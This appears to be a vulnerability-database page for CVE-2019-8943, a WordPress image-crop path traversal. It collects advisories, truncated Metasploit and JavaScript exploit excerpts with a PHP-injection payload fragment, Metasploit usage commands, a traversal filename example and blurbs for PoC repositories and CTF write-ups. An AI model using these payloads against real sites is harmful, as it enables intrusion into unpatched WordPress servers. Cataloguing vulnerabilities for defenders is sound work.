Published: 20/02/2019 Updated: 23/02/2021

CVSS v2 Base Score: 4 | Impact Score: 2.9 | Exploitability Score: 8

CVSS v3 Base Score: 6.5 | Impact Score: 3.6 | Exploitability Score: 2.8

VMScore: 453

Vector: AV:N/AC:L/Au:S/C:N/I:P/A:N

WordPress up to and including 5.0.3 allows Path Traversal in wp_crop_image(). An attacker (who has privileges to crop an image) can write the output image to an arbitrary directory via a filename containing two image extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring.

Vulnerable Product	Search on Vulmon	Subscribe to Product
wordpress wordpress

Debian Bug report logs - #923583 wordpress: CVE-2019-8943 Package: src:wordpress; Maintainer for src:wordpress is Craig Small <csmall@debianorg>; Reported by: Salvatore Bonaccorso <carnil@debianorg> Date: Sat, 2 Mar 2019 13:15:04 UTC Severity: important Tags: security, upstream Found in version wordpress/503+df ...

Arch Linux Security Advisory ASA-201903-10 ========================================== Severity: High Date : 2019-03-18 CVE-ID : CVE-2019-8943 Package : wordpress Type : directory traversal Remote : Yes Link : securityarchlinuxorg/AVG-909 Summary ======= The package wordpress before version 51-1 is vulnerable to directory tr ...

Arch Linux Security Advisory ASA-201902-30 ========================================== Severity: High Date : 2019-02-28 CVE-ID : CVE-2019-8943 Package : wordpress Type : directory traversal Remote : Yes Link : securityarchlinuxorg/AVG-909 Summary ======= The package wordpress before version 51-1 is vulnerable to directory tr ...

WordPress through 503 allows Path Traversal in wp_crop_image() An attacker (who has privileges to crop an image) can write the output image to an arbitrary directory via a filename containing two image extensions and / sequences, such as a filename ending with the jpg?///filejpg substring ...

## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super(update_info( ...

var wpnonce = ''; var ajaxnonce = ''; var wp_attached_file = ''; var imgurl = ''; var postajaxdata = ''; var post_id = 0; var cmd = '<?php phpinfo();/*'; var cmdlen = cmdlength var payload = '\xff\xd8\xff\xed\x004Photoshop 30\x008BIM\x04\x04'+'\x00'repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x0 ...

This module exploits a path traversal and a local file inclusion vulnerability on WordPress versions 5.0.0 and <= 4.9.8. The crop-image function allows a user, with at least author privileges, to resize an image and perform a path traversal by changing the _wp_attached_file reference during the upload. The second part of the exploit will include this image in the current theme by changing the _wp_page_template attribute when creating a post. This exploit module only works for Unix-based systems currently.

msf > use exploit/multi/http/wp_crop_rce
      msf exploit(wp_crop_rce) > show targets
            ...targets...
      msf exploit(wp_crop_rce) > set TARGET <target-id>
      msf exploit(wp_crop_rce) > show options
            ...show and set options...
      msf exploit(wp_crop_rce) > exploit

Blog Writeup (Tryhackme) - by yag1n3 Room Info Room Labels CVE-2019-8943 Wordpress Blog Web Room Objetives Roottxt Usertxt Where was usertxt found? What CMS was Billy using? What version of the above CMS was being used? Reconnaissance Nmap A Wordpress site and some Samba Samba We use enum4linux to retrieve some information We are able to access the share BillySMB wi

WEB02 WHITEHAT 30 Bài này dựa trên lỗ hổng của wordpress bản 500(CVE-2019-8943) Qua bài này có lẽ mọi người sẽ thấy được tầm quan trọng của việc chơi CTF Có người bảo CTF không thực tế không nên tốn thời gian vào nó CTF đúng chỉ là

WordPress Crop-Image CVE-2019-8943 A python3 script for WordPress Crop-Image CVE-2019-8943 Authenticated Remote Code Execution (RCE) It drops a malicious PHP backdoor Getting Started Executing program RCE python3 wp_rcepy -t wordpressrce/ -u admin -p password -m twentytwenty Help For help menu: python3 wp_rcepy -h

Exploit of CVE-2019-8942 and CVE-2019-8943

CVE-2019-8943 Exploit of CVE-2019-8942 and CVE-2019-8943

WordPress-RCE WordPress 500 - Image Remote Code Execution Exploit of CVE-2019-8942 and CVE-2019-8943 using python : ExploitDB : wwwexploit-dbcom/exploits/49512 The original exploit for metasploit : WordPress Core 500 - Crop-image Shell Upload (Metasploit) : wwwexploit-dbcom/exploits/46662

A simple PoC for WordPress RCE (author priviledge), refer to CVE-2019-8942 and CVE-2019-8943.

Summary A simple PoC for WordPress RCE (author priviledge), refer to CVE-2019-8942 and CVE-2019-8943 Affected Version WordPress <= 498 (verified) WordPress <= 500 Test Environment Docker Image docker pull avfisherdocker/wordpress:498 docker run -d -p 80:80 avfisherdocker/wordpress:498 Mysql & WordPress Info Type Username Password mysql

WordPress 500 Crop-image Remote Code Execution Description The exploit code take advantage from CVE-2019-8943 and CVE-2019-8942 vulnerabilities to gain remote code execution on WordPress 500 and <= 498 Exploitation root@kali:~# python3 pocpy --url mysitecom -u uriel -p qwerty -lhost 101062 -lport 443 [*] Authenticating to wordpress [+] Login successful

CVE-2019-8942 and CVE-2019-8943: WordPress RCE (author priviledge) Tổng quan CVE-2019-8942 là lỗ hổng lợi dụng lỗi LFI kết hợp tính năng File Upload để thực hiện RCE đến máy chủ web Wordpress với quyền author Các phiên bản Wordpress bị ảnh hưởng bao gồm trước 499 và 5x tới trước 50

Some exploits I have written to showcase and to share

exploits Some exploits I have written to showcase and to share All exploits are for vulnerabilities that have been fixed for months prior to release and are not meant to be used for exploitation in any way, but for educational purposes only Here is the list of the exploits you can find here: CVE Software Impact Write-Up CVE-2020-27194 Linux LPE scannellme/fuzz

DerpNStink Desarrollo del CTF DerpNStink 1 Configuración de la VM Download la VM: wwwvulnhubcom/entry/derpnstink-1,221/ 2 Escaneo de Puertos # Nmap 791 scan initiated Wed Apr 21 17:14:59 2021 as: nmap -n -P0 -p- -sC -sV -O -T5 -oA full 19216856105 Nmap scan report for 19216856105 Host is up (000072s latency) Not shown: 65532 closed ports PORT STA

SecBooks 各大文库公众号文章收集，部分文库使用gitbook部署；部分公众号使用杂散文章为主。使用插件 "hide-element", "back-to-top-button", "-lunr", "-search", "search-pro", "splitter" #目录自动生成插件(book sm) npm install -g gitbook-summ

PoC in GitHub 2021 CVE-2021-1056 (2021-01-07) NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidiako) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure pokerfaceSad/CVE-2021-1056 CVE-2021-

PoC in GitHub 2020 CVE-2020-0014 It is possible for a malicious application to construct a TYPE_TOAST window manually and make that window clickable This could lead to a local escalation of privilege with no additional execution privileges needed User action is needed for exploitationProduct: AndroidVersions: Android-80 Android-81 Android-9 Android-10Android ID: A-1286745

PoC in GitHub 2020 CVE-2020-0014 (2020-02-13) It is possible for a malicious application to construct a TYPE_TOAST window manually and make that window clickable This could lead to a local escalation of privilege with no additional execution privileges needed User action is needed for exploitationProduct: AndroidVersions: Android-80 Android-81 Android-9 Android-10Android

PoC auto collect from GitHub.

PoC in GitHub 2020 CVE-2020-0022 In reassemble_and_dispatch of packet_fragmentercc, there is possible out of bounds write due to an incorrect bounds calculation This could lead to remote code execution over Bluetooth with no additional execution privileges needed User interaction is not needed for exploitationProduct: AndroidVersions: Android-80 Android-81 Android-9 Andr

CWE-22 https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/http://www.securityfocus.com/bid/107089 https://www.exploit-db.com/exploits/46511/http://packetstormsecurity.com/files/152396/WordPress-5.0.0-crop-image-Shell-Upload.html http://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce https://www.exploit-db.com/exploits/46662/http://packetstormsecurity.com/files/161213/WordPress-5.0.0-Remote-Code-Execution.html https://github.com/yaguine/blog https://www.securityfocus.com/bid/107089 https://tools.cisco.com/security/center/viewAlert.x?alertId=59666 https://nvd.nist.gov https://github.com/v0lck3r/CVE-2019-8943 https://www.exploit-db.com/exploits/46662

CVE-2019-8943

Vulnerability Summary

Most Upvoted Vulmon Research Post

Vulnerability Trend

Vendor Advisories

Exploits

Metasploit Modules

Github Repositories

References

Vulmon Search

About

Products

Connect